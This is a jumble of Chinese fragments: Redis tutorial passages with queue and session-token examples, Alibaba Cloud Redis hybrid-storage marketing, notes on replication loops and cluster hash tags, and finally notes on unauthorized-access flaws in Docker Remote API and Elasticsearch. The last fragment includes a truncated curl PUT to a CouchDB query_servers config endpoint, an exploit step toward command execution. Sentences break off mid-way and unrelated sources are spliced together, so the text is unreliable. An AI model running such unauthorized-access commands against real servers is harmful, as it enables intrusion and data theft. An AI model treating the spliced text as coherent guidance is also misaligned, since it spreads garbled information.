在上述准备⼯作圆满完成之后， 我们就可以开始学习 Redis 命令的基本知识了。 1.5 执⾏命令 Redis 服务器通过接收客户端发送的命令请求来执⾏指定的命令， 并在命令执⾏完毕之后通过响应将命令的执⾏ 结果返回给客户端， ⾄于结果的内容则被称为命令回复。 图 1-2 命令请求与响应 Redis 为每种数据结构和功能特性都提供了⼀簇相应的命令， 学习如何使⽤这些命令是学习 Redis 的重中之重。 幸运的是， LoginSession 的 create() ⽅法⾸先会计算出随机的会话令牌以及会话的过期时间戳， 然后使⽤⽤户 ID 作为字 段， 将令牌和过期时间戳分别储存到两个散列⾥⾯。 在此之后， 每当客户端向服务器发送请求并提交令牌的时候， 程序就会使⽤ validate() ⽅法验证被提交令牌的 正确性： validate() ⽅法会根据⽤户的 ID ， 从两个散列⾥⾯分别取出⽤户的会话令牌以及会话的过期时间戳， "buy-request") 然后通过执⾏以下代码， 将三个⽤户的购买请求依次放⼊到队列⾥⾯： >>> q.enqueue("peter-buy-milk") 1 >>> q.enqueue("john-buy-rice") 2 >>> q.enqueue("david-buy-keyboard") 3 最后， 按照先进先出顺序， 依次从队列中弹出相应的购买请求： >>> q.dequeue() 'peter-buy-milk'

e被保存在内存中，保证绝大部分访问请求的最高性能 。不常访问的Value（冷数据）则会被存储到磁盘上，以达到内存利用最高性价比。 架构 兼容性 100%兼容Redis协议和特性，用户无需做任何改动。 冷热数据分离 Redis混合存储型实例中，所有的Key和经常访问的Value被保存在内存中，保证绝大部分访问请求的 最高性能。不常访问的Value 率、Value大小这三个维度综 合考虑挑选出一些数据，通过后台线程将之存储到磁盘上。 当用户访问数据时，如果该数据对应的 Value在磁盘上，后台线程会从磁盘中交换数据到内存中。在此过程中，其它请求不受影响。 存储引擎 Redis混合存储型实例底层存储采用阿里自研下一代高性能全用户态存储引擎Alibaba FusionEngine： Alibaba Fusion 完全兼容Redis协议，用户无需修改任何代码。 大容量 突破内存容量限制，单实例最高可支持TB级别的数据容量。 高性能 Redis混合存储型实例的绝大部分热点请求直接从内存获取，其性能与高性能内存型实例完 全一致。 基于其冷热数据分离的特性，部分非热点数据（Value)被保存在磁盘。基于阿里云自研的用 户态存储软件栈以及充分发挥最新硬件的性能，访问（非热点数据）磁盘数据时，性能可达

A: • set k v Redis B: • set k v 发生在端对端的互相同步过程中 假设有两个 Redis: A 和 B • A 收到客户端的请求: set k v • A 将请求通知到 B • B 收到请求后, 再次通知 A 解决方案: 标记客户端类型 双向回环 client Set k v set k v set k v set k v 复制回环 发生在多个点的互相同步过程

slot:15118 db:0 云数据库 Redis 版 快速入门 10 集群实例受限命令只支持所操作 key 均分布在单个 hash slot 中的场景，没有实现多个 hash slot 数 据的合并功能，因此需要用 hash tag 的方式确保要操作的 key 均分布在一个 hash slot 中。 比如有 key1，aakey，abkey3，那么我们在存储的时候需要用 {key}1，aa{key}，ab{key}3

Remote API 是一个取代远程命令行界面（rcli）的REST API。存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过 这个接口，我们可以新建 container，删除已有 container，甚至是获取宿主机的 shell。 漏洞利用 环境介绍 环境搭建 vncviewer h的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄 露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。 Elasticsearch服务普遍存在一个未授权访问的问题，攻击者通常可以请求一个开放9200或9300的 服务器进行恶意攻击。 #依次执行如下命令 curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd'